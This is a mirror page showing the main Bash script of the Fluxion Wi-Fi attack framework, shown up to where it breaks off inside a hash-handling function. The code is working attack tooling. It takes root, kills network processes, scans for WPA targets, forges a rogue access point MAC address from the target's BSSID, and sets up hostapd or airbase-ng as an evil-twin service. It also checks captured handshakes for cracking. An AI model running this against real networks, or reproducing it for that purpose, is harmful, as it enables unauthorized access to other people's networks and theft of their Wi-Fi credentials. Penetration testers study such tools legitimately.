Mirrors
/
fluxion
mirror of https://github.com/FluxionNetwork/fluxion.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
fluxion/fluxion.sh

1000 lines
31 KiB
Bash
Executable File
Raw Blame History

#!/bin/bash
################################ < FLUXION Parameters > ################################
# NOTE: The FLUXIONPath constant will not be populated correctly if the script is called
# directly via a symlink. Symlinks in the path to the script should work completely fine.
FLUXIONPath="$( cd "$(dirname "$0")" ; pwd -P )"
FLUXIONWorkspacePath="/tmp/fluxspace"
FLUXIONHashPath="$FLUXIONPath/attacks/Handshake Snooper/handshakes"
FLUXIONScanDB="dump"
FLUXIONNoiseFloor=-90
FLUXIONNoiseCeiling=-60
FLUXIONVersion=3
FLUXIONRevision=0
FLUXIONDebug=${FLUXIONDebug:+1}
FLUXIONDropNet=${FLUXIONDropNet:+1}
FLUXIONAuto=${FLUXION_AUTO:+1}
# FLUXIONDebug [Normal Mode "" / Developer Mode 1]
export FLUXIONOutputDevice=$([ $FLUXIONDebug ] && echo "/dev/stdout" || echo "/dev/null")
FLUXIONHoldXterm=$([ $FLUXIONDebug ] && echo "-hold" || echo "")
################################# < Shell Color Codes > ################################
CRed="\033[1;31m"
CGrn="\033[1;32m"
CYel="\033[1;33m"
CBlu="\033[1;34m"
CPrp="\033[5;35m"
CCyn="\033[5;36m"
CGry="\033[0;37m"
CWht="\033[1;37m"
CClr="\e[0m"
################################ < FLUXION Parameters > ################################
FLUXIONPrompt="$CRed[${CBlu}fluxion$CYel@$CClr$HOSTNAME$CRed]-[$CYel~$CRed]$CClr "
FLUXIONVLine="$CRed[$CYel*$CRed]$CClr"
################################# < Library Includes > #################################
source lib/SandboxUtils.sh
source lib/IOUtils.sh
source lib/HashUtils.sh
source language/English.lang
################################ < Library Parameters > ################################
SandboxWorkspacePath="$FLUXIONWorkspacePath"
SandboxOutputDevice="$FLUXIONOutputDevice"
IOUtilsHeader="fluxion_header"
IOUtilsQueryMark="$FLUXIONVLine"
IOUtilsPrompt="$FLUXIONPrompt"
HashOutputDevice="$FLUXIONOutputDevice"
########################################################################################
if [[ $EUID -ne 0 ]]; then
echo -e "${CRed}You don't have admin privilegies, execute the script as root.$CClr"
exit 1
fi
if [ -z "${DISPLAY:-}" ]; then
echo -e "${CRed}The script should be exected inside a X (graphical) session.$CClr"
exit 1
fi
function exitmode() {
if [ ! $FLUXIONDebug ]; then
fluxion_header
echo -e "\n\n$CWht[$CRed-$CWht]$CRed $FLUXIONCleanupAndClosingNotice$CClr"
local processes
readarray processes < <(ps -A)
# Currently, fluxion is only responsible for killing airodump-ng,
# since it uses it to scan for candidate target access points.
# Everything else should be taken care of by the custom attack abort handler.
local targets=("airodump-ng")
local targetID # Program identifier/title
for targetID in "${targets[@]}"; do
# Get PIDs of all programs matching targetPID
local targetPID=$(echo "${processes[@]}" | awk '$4~/'"$targetID"'/{print $1}')
if [ ! "$targetPID" ]; then continue; fi
echo -e "$CWht[$CRed-$CWht] `io_dynamic_output $FLUXIONKillingProcessNotice`"
killall $targetPID &> $FLUXIONOutputDevice
done
if [ "$WIAccessPoint" ]; then
echo -e "$CWht[$CRed-$CWht] $FLUXIONDisablingExtraInterfacesNotice$CGrn $WIAccessPoint$CClr"
iw dev $WIAccessPoint del &> $FLUXIONOutputDevice
fi
if [ "$WIMonitor" ]; then
echo -e "$CWht[$CRed-$CWht] $FLUXIONDisablingMonitorNotice$CGrn $WIMonitor$CClr"
airmon-ng stop $WIMonitor &> $FLUXIONOutputDevice
fi
#if [ "`cat /proc/sys/net/ipv4/ip_forward`" != "0" ]; then
# echo -e "$CWht[$CRed-$CWht] $FLUXIONDisablingPacketForwardingNotice$CClr"
# sysctl -w net.ipv4.ip_forward=0 &> $FLUXIONOutputDevice
#fi
#echo -e "$CWht[$CRed-$CWht] $FLUXIONDisablingCleaningIPTablesNotice$CClr"
#if [ ! -f "$FLUXIONWorkspacePath/iptables-rules" ];then
# iptables --flush
# iptables --table nat --flush
# iptables --delete-chain
# iptables --table nat --delete-chain
#else
# iptables-restore < "$FLUXIONWorkspacePath/iptables-rules"
#fi
echo -e "$CWht[$CRed-$CWht] $FLUXIONRestoringTputNotice$CClr"
tput cnorm
if [ ! $FLUXIONDebug ]; then
echo -e "$CWht[$CRed-$CWht] $FLUXIONDeletingFilesNotice$CClr"
sandbox_remove_workfile "$FLUXIONWorkspacePath/*"
fi
if [ $FLUXIONDropNet ]; then
echo -e "$CWht[$CRed-$CWht] $FLUXIONRestartingNetworkManagerNotice$CClr"
# systemctl check
systemd=$(whereis systemctl)
if [ "$systemd" = "" ];then
service network-manager restart &> $FLUXIONOutputDevice &
service networkmanager restart &> $FLUXIONOutputDevice &
service networking restart &> $FLUXIONOutputDevice &
else
systemctl restart NetworkManager &> $FLUXIONOutputDevice &
fi
fi
echo -e "$CWht[$CGrn+$CWht] $CGrn$FLUXIONCleanupSuccessNotice$CClr"
echo -e "$CWht[$CGrn+$CWht] $CGry$FLUXIONThanksSupportersNotice$CClr"
sleep 2
clear
fi
exit
}
# Delete log only in Normal Mode !
function conditional_clear() {
# Clear iff we're not in debug mode
if [ ! $FLUXIONDebug ]; then clear; fi
}
function conditional_bail() {
echo "Something went wrong, whoops!"; sleep 5
if [ ! $FLUXIONDebug ]; then exitmode; return 0; fi
echo "Press any key to continue execution..."
read bullshit
}
function check_updates() {
# Attempt to retrieve versioning information from repository script.
local FLUXIONOnlineInfo=("`timeout -s SIGTERM 20 curl "https://raw.githubusercontent.com/FluxionNetwork/fluxion/master/fluxion.sh" 2>/dev/null | egrep "^(FLUXIONVersion|FLUXIONRevision)"`")
if [ -z "${FLUXIONOnlineInfo[@]}" ]; then
FLUXIONOnlineInfo=("version=?\n" "revision=?\n")
fi
echo -e "${FLUXIONOnlineInfo[@]}" > "$FLUXIONWorkspacePath/latest_version"
}
# Animation
function spinner() {
local pid=$1
local delay=0.15
local spinstr='|/-\'
tput civis
while [ "`ps a | awk '{print $1}' | grep $pid`" ]; do
local temp=${spinstr#?}
printf " [%c] " "$spinstr"
local spinstr=$temp${spinstr%"$temp"}
sleep $delay
printf "\b\b\b\b\b\b"
done
printf " \b\b\b\b"
tput cnorm
}
# ERROR Report only in Developer Mode
function error_report() {
echo "Error on line $1"
}
if [ "$FLUXIONDebug" ]; then
trap 'error_report $LINENUM' ERR
fi
function handle_abort_attack() {
if [ $(type -t stop_attack) ]; then
stop_attack &> $FLUXIONOutputDevice
else
echo "Attack undefined, can't stop anything..." > $FLUXIONOutputDevice
fi
}
# In case an abort signal is received,
# abort any attacks currently running.
trap handle_abort_attack SIGABRT
function handle_exit() {
handle_abort_attack
exitmode
}
# In case of unexpected termination, run exitmode
# to execute cleanup and reset commands.
trap handle_exit SIGINT SIGHUP
# Design
function fluxion_header() {
conditional_clear
local headerWidth=$(($(tput cols) - 2))
local headerMessage="${CRed}FLUXION $FLUXIONVersion ${CRed}< F${CYel}luxion ${CRed}I${CYel}s ${CRed}T${CYel}he ${CRed}F${CYel}uture >"
local headerMessageEscaped=$(echo "$headerMessage" | sed -r 's/\\(e|033)\[[0-9];?[0-9]*m//g')
local headerMessageWidth=${#headerMessageEscaped}
local headerMessagePadding=$(($(($headerWidth - $headerMessageWidth)) / 2))
echo -e "`printf "$CRed[%${headerWidth}s]\n" "" | sed -r "s/ /~/g"`"
echo -e "`printf "$CRed[%${headerWidth}s]\n" ""`"
echo -e "`printf "$CRed[%${headerMessagePadding}s%b%${headerMessagePadding}s$CBlu]\n" "" "$headerMessage" ""`"
echo -e "`printf "$CBlu[%${headerWidth}s]\n" ""`"
echo -e "`printf "$CBlu[%${headerWidth}s]\n$CClr" "" | sed -r "s/ /~/g"`"
}
####################################### < Start > ######################################
function check_dependencies() {
local CLITools=("aircrack-ng" "aireplay-ng" "airmon-ng" "airodump-ng" "airbase-ng" "awk" "curl" "dhcpd" "hostapd" "iwconfig" "lighttpd" "macchanger" "mdk3" "nmap" "php-cgi" "pyrit" "unzip" "xterm" "openssl" "rfkill" "strings" "fuser" "seq" "sed")
local CLIToolsMissing
for CLITool in ${CLITools[*]}; do
# Could use parameter replacement, but requires extra variable.
echo -ne "$FLUXIONVLine `printf "%-64s" "$CLITool" | sed 's/ /./g'`"
if ! hash $CLITool 2>/dev/null; then
echo -e "$CRed Missing!$CClr"
CLIToolsMissing=1
else
echo -e ".....$CGrn OK.$CClr"
fi
sleep 0.025
done
if [ $CLIToolsMissing ]; then
exit 1
fi
sleep 1
}
# Create working directory
if [ ! -d "$FLUXIONWorkspacePath" ]; then
mkdir -p "$FLUXIONWorkspacePath" &> $FLUXIONOutputDevice
fi
if [ ! $FLUXIONDebug ]; then
clear; echo
sleep 0.01 && echo -e "$CRed "
sleep 0.01 && echo -e " ⌠▓▒▓▒ ⌠▓╗ ⌠█┐ ┌█ ┌▓\ /▓┐ ⌠▓╖ ⌠◙▒▓▒◙ ⌠█\ ☒┐ "
sleep 0.01 && echo -e " ║▒_ │▒║ │▒║ ║▒ \▒\/▒/ │☢╫ │▒┌╤┐▒ ║▓▒\ ▓║ "
sleep 0.01 && echo -e " ≡◙◙ ║◙║ ║◙║ ║◙ ◙◙ ║¤▒ ║▓║☯║▓ ♜◙\✪\◙♜ "
sleep 0.01 && echo -e " ║▒ │▒║__ │▒└_┘▒ /▒/\▒\ │☢╫ │▒└╧┘▒ ║█ \▒█║ "
sleep 0.01 && echo -e " ⌡▓ ⌡◘▒▓▒ ⌡◘▒▓▒◘ └▓/ \▓┘ ⌡▓╝ ⌡◙▒▓▒◙ ⌡▓ \▓┘ "
sleep 0.01 && echo -e " ¯¯¯ ¯¯¯¯¯¯ ¯¯¯¯¯¯¯ ¯¯¯ ¯¯¯ ¯¯¯¯ ¯¯¯¯¯¯¯ ¯¯¯¯¯¯¯¯ "
echo
sleep 0.1
echo -e "$CRed FLUXION $CWht$FLUXIONVersion (rev. $CGrn$FLUXIONRevision$CWht)$CYel by$CWht ghost"
sleep 0.1
echo -e "$CGrn Site: ${CRed}https://github.com/FluxionNetwork/fluxion$CClr"
sleep 0.1
echo -n " Online Version"
check_updates &
spinner "$!"
if [ -f "$FLUXIONWorkspacePath/latest_version" -a \
-s "$FLUXIONWorkspacePath/latest_version" ]; then
mapfile FLUXIONOnlineInfo < "$FLUXIONWorkspacePath/latest_version"
FLUXIONOnlineVersion=$(echo "${FLUXIONOnlineInfo[@]}" | awk -F= 'tolower($1)~/version/{print $2}')
FLUXIONOnlineRevision=$(echo "${FLUXIONOnlineInfo[@]}" | awk -F= 'tolower($1)~/revision/{print $2}')
else
FLUXIONOnlineVersion="?"
FLUXIONOnlineRevision="?"
fi
echo -e "$CClr [$CPrp$FLUXIONOnlineVersion.$FLUXIONOnlineRevision$CClr]"
if [ ! -z "${FLUXIONOnlineVersion[@]}" -a \
"$FLUXIONOnlineVersion" != "?" -a \
"$FLUXIONOnlineRevision" != "?" ]; then
if [ "$FLUXIONOnlineVersion" -gt "$FLUXIONVersion" -o \
"$FLUXIONOnlineVersion" -eq "$FLUXIONVersion" -a \
"$FLUXIONOnlineRevision" -gt "$FLUXIONRevision" ]; then
echo
echo
echo -ne $CRed" New revision found! "$CYel
echo -ne "Update? [Y/n]: "$CClr
read -N1 doupdate
echo -ne "$CClr"
doupdate=${doupdate:-"Y"}
if [ "$doupdate" = "Y" ]; then
cp $0 $HOME/flux_rev-$FLUXIONRevision.backup
curl "https://raw.githubusercontent.com/FluxionNetwork/fluxion/master/fluxion" -s -o $0
echo
echo
echo -e ""$CRed"Updated successfully! Restarting the script to apply the changes ..."$CClr""
sleep 3
chmod +x $0
exec $0
exit
fi
fi
fi
echo
sleep 1
fi
#################################### < Resolution > ####################################
# Windows + Resolution
function set_resolution() {
function resA() {
TOPLEFT="-geometry 90x13+0+0"
TOPRIGHT="-geometry 83x26-0+0"
BOTTOMLEFT="-geometry 90x24+0-0"
BOTTOMRIGHT="-geometry 75x12-0-0"
TOPLEFTBIG="-geometry 91x42+0+0"
TOPRIGHTBIG="-geometry 83x26-0+0"
}
function resB() {
TOPLEFT="-geometry 92x14+0+0"
TOPRIGHT="-geometry 68x25-0+0"
BOTTOMLEFT="-geometry 92x36+0-0"
BOTTOMRIGHT="-geometry 74x20-0-0"
TOPLEFTBIG="-geometry 100x52+0+0"
TOPRIGHTBIG="-geometry 74x30-0+0"
}
function resC() {
TOPLEFT="-geometry 100x20+0+0"
TOPRIGHT="-geometry 109x20-0+0"
BOTTOMLEFT="-geometry 100x30+0-0"
BOTTOMRIGHT="-geometry 109x20-0-0"
TOPLEFTBIG="-geometry 100x52+0+0"
TOPRIGHTBIG="-geometry 109x30-0+0"
}
function resD() {
TOPLEFT="-geometry 110x35+0+0"
TOPRIGHT="-geometry 99x40-0+0"
BOTTOMLEFT="-geometry 110x35+0-0"
BOTTOMRIGHT="-geometry 99x30-0-0"
TOPLEFTBIG="-geometry 110x72+0+0"
TOPRIGHTBIG="-geometry 99x40-0+0"
}
function resE() {
TOPLEFT="-geometry 130x43+0+0"
TOPRIGHT="-geometry 68x25-0+0"
BOTTOMLEFT="-geometry 130x40+0-0"
BOTTOMRIGHT="-geometry 132x35-0-0"
TOPLEFTBIG="-geometry 130x85+0+0"
TOPRIGHTBIG="-geometry 132x48-0+0"
}
function resF() {
TOPLEFT="-geometry 100x17+0+0"
TOPRIGHT="-geometry 90x27-0+0"
BOTTOMLEFT="-geometry 100x30+0-0"
BOTTOMRIGHT="-geometry 90x20-0-0"
TOPLEFTBIG="-geometry 100x70+0+0"
TOPRIGHTBIG="-geometry 90x27-0+0"
}
detectedresolution=$(xdpyinfo | grep -A 3 "screen #0" | grep dimensions | tr -s " " | cut -d" " -f 3)
## A) 1024x600
## B) 1024x768
## C) 1280x768
## D) 1280x1024
## E) 1600x1200
case $detectedresolution in
"1024x600" ) resA ;;
"1024x768" ) resB ;;
"1280x768" ) resC ;;
"1366x768" ) resC ;;
"1280x1024" ) resD ;;
"1600x1200" ) resE ;;
"1366x768" ) resF ;;
* ) resA ;;
esac
}
##################################### < Language > #####################################
function set_language() {
if [ ! $FLUXIONAuto ]; then
# Get all language files available.
local languages=(language/*.lang)
# Strip entries of "language/" and ".lang"
languages=(${languages[@]/language\//})
languages=(${languages[@]/.lang/})
io_query_choice "Select your language" languages[@]
source "$FLUXIONPath/language/$IOQueryChoice.lang"
echo
fi
}
#################################### < Interfaces > ####################################
function unset_interface() {
# Unblock interfaces to make them available.
echo -e "$FLUXIONVLine $FLUXIONUnblockingWINotice"
rfkill unblock all
# Find all monitor-mode interfaces & all AP interfaces.
echo -e "$FLUXIONVLine $FLUXIONFindingExtraWINotice"
WIMonitors=($(iwconfig 2>&1 | grep "Mode:Monitor" | awk '{print $1}'))
# Remove all monitor-mode & all AP interfaces.
echo -e "$FLUXIONVLine $FLUXIONRemovingExtraWINotice"
if [ ${#WIMonitors[@]} -gt 0 ]; then
for monitor in ${WIMonitors[@]}; do
# Replace interface's mon with ap & remove interface.
iw dev ${monitor/mon/ap} del 2> $FLUXIONOutputDevice
# Remove monitoring interface after AP interface.
airmon-ng stop $monitor > $FLUXIONOutputDevice
if [ $FLUXIONDebug ]; then
echo -e "Stopped $monitor."
fi
done
fi
WIMonitor=""
WIAccessPoint=""
}
# Choose Interface
function set_interface() {
if [ "$WIMonitor" -a "$WIAccessPoint" ]; then return 0; fi
unset_interface
# Gather candidate interfaces.
echo -e "$FLUXIONVLine $FLUXIONFindingWINotice"
# Create an array with the list of all available wireless network interfaces.
local WIAvailableData
readarray -t WIAvailableData < <(airmon-ng | grep -P 'wl(an\d+|\w+)' | sed -r 's/[ ]{2,}|\t+/:_:/g')
local WIAvailableDataCount=${#WIAvailableData[@]}
local WIAvailable=()
local WIAvailableInfo=()
local WIAvailableColor=()
for (( i = 0; i < WIAvailableDataCount; i++ )); do
local data="${WIAvailableData[i]}"
WIAvailable[i]=$(echo "$data" | awk -F':_:' '{print $2}')
WIAvailableInfo[i]=$(echo "$data" | awk -F':_:' '{print $4}')
if [ "`ifconfig ${WIAvailable[i]} | grep "RUNNING"`" ]; then
WIAvailableColor[i]="$CPrp"
WIAvailableState[i]="-"
else
WIAvailableColor[i]="$CClr"
WIAvailableState[i]="+"
fi
done
WIAvailable[${#WIAvailable[@]}]="$FLUXIONGeneralRepeatOption"
WIAvailableColor[${#WIAvailableColor[@]}]="$CClr" # (Increases record count)
WIAvailableState[${#WIAvailableState[@]}]="x"
local WISelected
local WISelectedState
if [ $WIAvailableDataCount -eq 1 -a ${WIAvailableState[0]} = '+' ]; then
WISelected="${WIAvailable[0]}"
else
io_query_format_fields "$FLUXIONVLine $FLUXIONInterfaceQuery" \
"$CRed[$CYel%d$CRed]%b %-8b [%1s] %s\n" \
WIAvailableColor[@] WIAvailable[@] WIAvailableState[@] WIAvailableInfo[@]
WISelected="${IOQueryFormatFields[1]}"
WISelectedState="${IOQueryFormatFields[2]}"
echo
fi
if [ "$WISelected" = "$FLUXIONGeneralRepeatOption" ]; then
unset_interface; return 1
fi
if [ ! "$FLUXIONDropNet" -a "$WISelectedState" = "-" ]; then
echo -e "$FLUXIONVLine $FLUXIONSelectedBusyWIError"
echo -e "$FLUXIONVLine $FLUXIONSelectedBusyWITip"
sleep 7; unset_interface; return 1;
fi
# Get selected interface's driver details/info-descriptor.
echo -e "$FLUXIONVLine $FLUXIONGatheringWIInfoNotice"
WIDriver=$(airmon-ng | grep $WISelected | awk '{print $3}')
if [ $FLUXIONDropNet ]; then
# I'm not really sure about this conditional here.
# FLUXION 2 had the conditional so I kept it there.
if [ ! "$(echo $WIDriver | egrep 'rt2800|rt73')" ]; then
rmmod -f $WIDriver &> $FLUXIONOutputDevice 2>&1
fi
# Get list of potentially troublesome programs.
echo -e "$FLUXIONVLine $FLUXIONFindingConflictingProcessesNotice"
ConflictPrograms=($(airmon-ng check | awk 'NR>6{print $2}'))
# Kill potentially troublesome programs.
echo -e "$FLUXIONVLine $FLUXIONKillingConflictingProcessesNotice"
for program in "${ConflictPrograms[@]}"; do
killall "$program" &> $FLUXIONOutputDevice
done
sleep 0.5
# I'm not really sure about this conditional here.
# FLUXION 2 had the conditional so I kept it there.
if [ ! "$(echo $WIDriver | egrep 'rt2800|rt73')" ]; then
modprobe "$WIDriver" &> $FLUXIONOutputDevice 2>&1
sleep 0.5
fi
fi
run_interface
if [ $? -ne 0 ]; then return 1; fi
}
function run_interface() {
# Activate wireless interface monitor mode and save identifier.
echo -e "$FLUXIONVLine $FLUXIONStartingWIMonitorNotice"
WIMonitor=$(airmon-ng start $WISelected | awk -F'\[phy[0-9]+\]|\)' '$0~/monitor .* enabled/{print $3}' 2> /dev/null)
# Create an identifier for the access point, AP virtual interface.
# The identifier will follow this structure: wlanXap, where X is
# the integer assigned to the original interface, wlanXmon.
# In alternative systems, the strcture is: wl*ap and wl*mon.
WIAccessPoint=${WIMonitor/mon/ap}
# Create the new virtual interface with the generated identifier.
echo -e "$FLUXIONVLine $FLUXIONStartingWIAccessPointNotice"
if [ `iw dev $WIMonitor interface add $WIAccessPoint type monitor` ]; then
echo -e "$FLUXIONCannotStartWIAccessPointError"
sleep 5
return 1
fi
}
###################################### < Scanner > #####################################
function set_scanner() {
# If scanner's already been set and globals are ready, we'll skip setup.
if [ "$APTargetSSID" -a "$APTargetChannel" -a "$APTargetEncryption" -a \
"$APTargetMAC" -a "$APTargetMakerID" -a "$APRogueMAC" ]; then
return 0
fi
if [ $FLUXIONAuto ];then
run_scanner $WIMonitor
else
local choices=("$FLUXIONScannerChannelOptionAll" "$FLUXIONScannerChannelOptionSpecific" "$FLUXIONGeneralBackOption")
io_query_choice "$FLUXIONScannerChannelQuery" choices[@]
echo
case "$IOQueryChoice" in
"$FLUXIONScannerChannelOptionAll") run_scanner $WIMonitor;;
"$FLUXIONScannerChannelOptionSpecific") set_scanner_channel;;
"$FLUXIONGeneralBackOption") unset_interface; return 1;;
esac
fi
if [ $? -ne 0 ]; then return 1; fi
}
function set_scanner_channel() {
fluxion_header
echo -e "$FLUXIONVLine $FLUXIONScannerChannelQuery"
echo
echo -e " $FLUXIONScannerChannelSingleTip ${CBlu}6$CClr "
echo -e " $FLUXIONScannerChannelMiltipleTip ${CBlu}1-5$CClr "
echo -e " $FLUXIONScannerChannelMiltipleTip ${CBlu}1,2,5-7,11$CClr "
echo
echo -ne "$FLUXIONPrompt"
local channels
read channels
echo
run_scanner $WIMonitor $channels
if [ $? -ne 0 ]; then return 1; fi
}
# Parameters: monitor [channel(s)]
function run_scanner() {
echo -e "$FLUXIONVLine $FLUXIONStartingScannerNotice"
# Remove any pre-existing scanner results.
sandbox_remove_workfile "$FLUXIONWorkspacePath/dump*"
local monitor=$1
local channels=$2
if [ $FLUXIONAuto ]; then
sleep 30 && killall xterm &
fi
if [ "$channels" ]; then local channelsQuery="--channel $channels"; fi
# Begin scanner and output all results to "dump-01.csv."
xterm $FLUXIONHoldXterm -title "$FLUXIONScannerHeader" $TOPLEFTBIG -bg "#000000" -fg "#FFFFFF" -e airodump-ng -at WPA $channelsQuery -w "$FLUXIONWorkspacePath/dump" $monitor
local scannerResultsExist=$([ -f "$FLUXIONWorkspacePath/dump-01.csv" ] && echo true)
local scannerResultsReadable=$([ -s "$FLUXIONWorkspacePath/dump-01.csv" ] && echo true)
if [ ! "$scannerResultsReadable" ]; then
if [ "$scannerResultsExist" ]; then
sandbox_remove_workfile "$FLUXIONWorkspacePath/dump*"
fi
local choices=("$FLUXIONGeneralBackOption" "$FLUXIONGeneralExitOption")
io_query_choice "$FLUXIONScannerFailedNotice" choices[@]
case "$IOQueryChoice" in
"$FLUXIONGeneralBackOption") return 1;;
"$FLUXIONGeneralExitOption") exitmode; return 2;;
esac
fi
# Syntheize scan operation results from output file "dump-01.csv."
echo -e "$FLUXIONVLine $FLUXIONPreparingScannerResultsNotice"
# Unfortunately, mawk (alias awk) does not support the {n} times matching operator.
# readarray TargetAPCandidates < <(gawk -F, 'NF==15 && $1~/([A-F0-9]{2}:){5}[A-F0-9]{2}/ {print $0}' $FLUXIONWorkspacePath/dump-01.csv)
readarray TargetAPCandidates < <(awk -F, 'NF==15 && length($1)==17 && $1~/([A-F0-9][A-F0-9]:)+[A-F0-9][A-F0-9]/ {print $0}' "$FLUXIONWorkspacePath/dump-01.csv")
# readarray TargetAPCandidatesClients < <(gawk -F, 'NF==7 && $1~/([A-F0-9]{2}:){5}[A-F0-9]{2}/ {print $0}' $FLUXIONWorkspacePath/dump-01.csv)
readarray TargetAPCandidatesClients < <(awk -F, 'NF==7 && length($1)==17 && $1~/([A-F0-9][A-F0-9]:)+[A-F0-9][A-F0-9]/ {print $0}' "$FLUXIONWorkspacePath/dump-01.csv")
# Cleanup the workspace to prevent potential bugs/conflicts.
sandbox_remove_workfile "$FLUXIONWorkspacePath/dump*"
if [ ${#TargetAPCandidates[@]} -eq 0 ]; then
sandbox_remove_workfile "$FLUXIONWorkspacePath/dump*"
echo -e "$FLUXIONVLine $FLUXIONScannerDetectedNothingNotice"
sleep 3; return 1
fi
}
###################################### < Target > ######################################
function unset_target_ap() {
APTargetSSID=""
APTargetChannel=""
APTargetEncryption=""
APTargetMAC=""
APTargetMakerID=""
APTargetMaker=""
APRogueMAC=""
}
function set_target_ap() {
if [ "$APTargetSSID" -a "$APTargetChannel" -a "$APTargetEncryption" -a \
"$APTargetMAC" -a "$APTargetMakerID" -a "$APRogueMAC" ]; then
return 0
fi
unset_target_ap
local TargetAPCandidatesMAC=()
local TargetAPCandidatesClientsCount=()
local TargetAPCandidatesChannel=()
local TargetAPCandidatesSecurity=()
local TargetAPCandidatesSignal=()
local TargetAPCandidatesPower=()
local TargetAPCandidatesESSID=()
local TargetAPCandidatesColor=()
for candidateAPInfo in "${TargetAPCandidates[@]}"; do
candidateAPInfo=$(echo "$candidateAPInfo" | sed -r "s/,\s*/,/g")
local i=${#TargetAPCandidatesMAC[@]}
TargetAPCandidatesMAC[i]=$(echo $candidateAPInfo | cut -d , -f 1)
TargetAPCandidatesClientsCount[i]=$(echo "${TargetAPCandidatesClients[@]}" | grep -c "${TargetAPCandidatesMAC[i]}")
TargetAPCandidatesChannel[i]=$(echo $candidateAPInfo | cut -d , -f 4)
TargetAPCandidatesSecurity[i]=$(echo $candidateAPInfo | cut -d , -f 6)
TargetAPCandidatesPower[i]=$(echo $candidateAPInfo | cut -d , -f 9)
TargetAPCandidatesESSID[i]=$(echo $candidateAPInfo | cut -d , -f 14)
TargetAPCandidatesColor[i]=$([ ${TargetAPCandidatesClientsCount[i]} -gt 0 ] && echo $CGrn || echo $CClr)
local power=${TargetAPCandidatesPower[i]}
if [ $power -eq -1 ]; then
# airodump-ng's man page says -1 means unsupported value.
TargetAPCandidatesQuality[i]="??";
elif [ $power -le $FLUXIONNoiseFloor ]; then
TargetAPCandidatesQuality[i]=0;
elif [ $power -gt $FLUXIONNoiseCeiling ]; then
TargetAPCandidatesQuality[i]=100;
else
# Bash doesn't support floating point division, so I gotta work around it...
# The function is Q = ((P - F) / (C - F)); Q - quality, P - power, F - floor, C - Ceiling.
TargetAPCandidatesQuality[i]=$((( ${TargetAPCandidatesPower[i]} * 10 - $FLUXIONNoiseFloor * 10 ) / ( ( $FLUXIONNoiseCeiling - $FLUXIONNoiseFloor ) / 10 ) ))
fi
done
local bashWidth=$(tput cols)
local ssidWidth=$(($bashWidth - 52))
local headWidth=$(($bashWidth / 2 + 4))
local header=$(printf "%${headWidth}s\n\n$CRed[$CYel * $CRed]$CClr %-${ssidWidth}s %4s %3s %3s %4s %8s %18s\n" "WIFI LIST" "SSID" "QLTY" "PWR" "CL" "CH" "SECURITY" "MAC ADDRESS")
io_query_format_fields "$header" "$CRed[$CYel%03d$CRed]%b %-${ssidWidth}s %3s%% %3s %3d %4s %8s %18s\n" \
TargetAPCandidatesColor[@] \
TargetAPCandidatesESSID[@] \
TargetAPCandidatesQuality[@] \
TargetAPCandidatesPower[@] \
TargetAPCandidatesClientsCount[@] \
TargetAPCandidatesChannel[@] \
TargetAPCandidatesSecurity[@] \
TargetAPCandidatesMAC[@]
APTargetSSID=${IOQueryFormatFields[1]}
APTargetChannel=${IOQueryFormatFields[5]}
APTargetEncryption=${IOQueryFormatFields[6]}
APTargetMAC=${IOQueryFormatFields[7]}
APTargetMakerID=${APTargetSSID:0:8}
APTargetMaker=$(macchanger -l | grep ${APTargetMakerID,,})
# Remove any special characters allowed in WPA2 ESSIDs for normalization.
# Removing: ' ', '[', ']', '(', ')', '*', ':'
APTargetSSIDClean="`echo "$APTargetSSID" | sed -r 's/( |\[|\]|\(|\)|\*|:)*//g'`"
# We'll change a single hex digit from the target AP's MAC address.
# This new MAC address will be used as the rogue AP's MAC address.
local APRogueMACChange=$(printf %02X $((0x${APTargetMAC:13:1} + 1)))
APRogueMAC="${APTargetMAC::13}${APRogueMACChange:1:1}${APTargetMAC:14:4}"
}
function view_target_ap_info() {
echo -e " "$CBlu" SSID"$CClr": $APTargetSSID / $APTargetEncryption"
echo -e " "$CBlu"Channel"$CClr": $APTargetChannel"
#echo -e " "$CBlu" Speed"$CClr": ${speed:2} Mbps"
echo -e " "$CBlu" BSSID"$CClr": $APTargetMAC ($CYel${APTargetMaker:-UNKNOWN}$CClr)"
echo
}
#################################### < AP Service > ####################################
function unset_ap_service() {
APRogueService="";
}
function set_ap_service() {
if [ "$APRogueService" ]; then return 0; fi
unset_ap_service
if [ $FLUXIONAuto ]; then
# airbase-ng isn't compatible with dhcpd, since airbase-ng sets
# the wireless interface in monitor mode, which dhcpd rejects.
# hostapd works, because it bring the interface into master mode,
# which dhcpd works perfecly fine with.
APRogueService="hostapd";
else
fluxion_header
echo -e "$FLUXIONVLine $FLUXIONAPServiceQuery"
echo
view_target_ap_info
local choices=("$FLUXIONAPServiceHostapdOption" "$FLUXIONAPServiceAirbaseOption" "$FLUXIONGeneralBackOption")
io_query_choice "" choices[@]
case "$IOQueryChoice" in
"$FLUXIONAPServiceHostapdOption" ) APRogueService="hostapd";;
"$FLUXIONAPServiceAirbaseOption" ) APRogueService="airbase-ng";;
"$FLUXIONGeneralBackOption" ) unset_ap_service; return 1;;
* ) conditional_bail; return 1;;
esac
fi
# AP Service: Load the service's helper routines.
source "lib/ap/$APRogueService.sh"
}
###################################### < Hashes > ######################################
function check_hash() {
if [ ! -f "$APTargetHashPath" -o ! -s "$APTargetHashPath" ]; then
echo -e "$FLUXIONVLine $FLUXIONHashFileDoesNotExistError"
sleep 3
return 1;
fi
fluxion_header
echo -e "$FLUXIONVLine $FLUXIONHashVerificationMethodQuery"
echo
view_target_ap_info
local choices=("$FLUXIONHashVerificationMethodPyritOption" "$FLUXIONHashVerificationMethodAircrackOption" "$FLUXIONGeneralBackOption")
io_query_choice "" choices[@]
local verifier
case "$IOQueryChoice" in
"$FLUXIONHashVerificationMethodPyritOption") verifier="pyrit";;
"$FLUXIONHashVerificationMethodAircrackOption") verifier="aircrack-ng";;
"$FLUXIONGeneralBackOption") return 1;;
esac
hash_check_handshake "$verifier" "$APTargetHashPath" "$APTargetSSID" "$APTargetMAC" > $FLUXIONOutputDevice
local hashResult=$?
# A value other than 0 means there's an issue with the hash.
if [ $hashResult -ne 0 ]
then echo -e "$FLUXIONVLine $FLUXIONHashInvalidError"
else echo -e "$FLUXIONVLine $FLUXIONHashValidNotice"
fi
sleep 3
if [ $hashResult -ne 0 ]; then return 1; fi
}
function set_hash_path() {
fluxion_header
echo
echo -e "$FLUXIONVLine $FLUXIONPathToHandshakeFileQuery"
echo
echo -ne "$FLUXIONAbsolutePathInfo: "
read APTargetHashPath
}
function unset_hash() {
APTargetHashPath=""
}
function set_hash() {
if [ "$APTargetHashPath" ]; then return 0; fi
unset_hash
# Scan for an existing hash for potential use, if one exists,
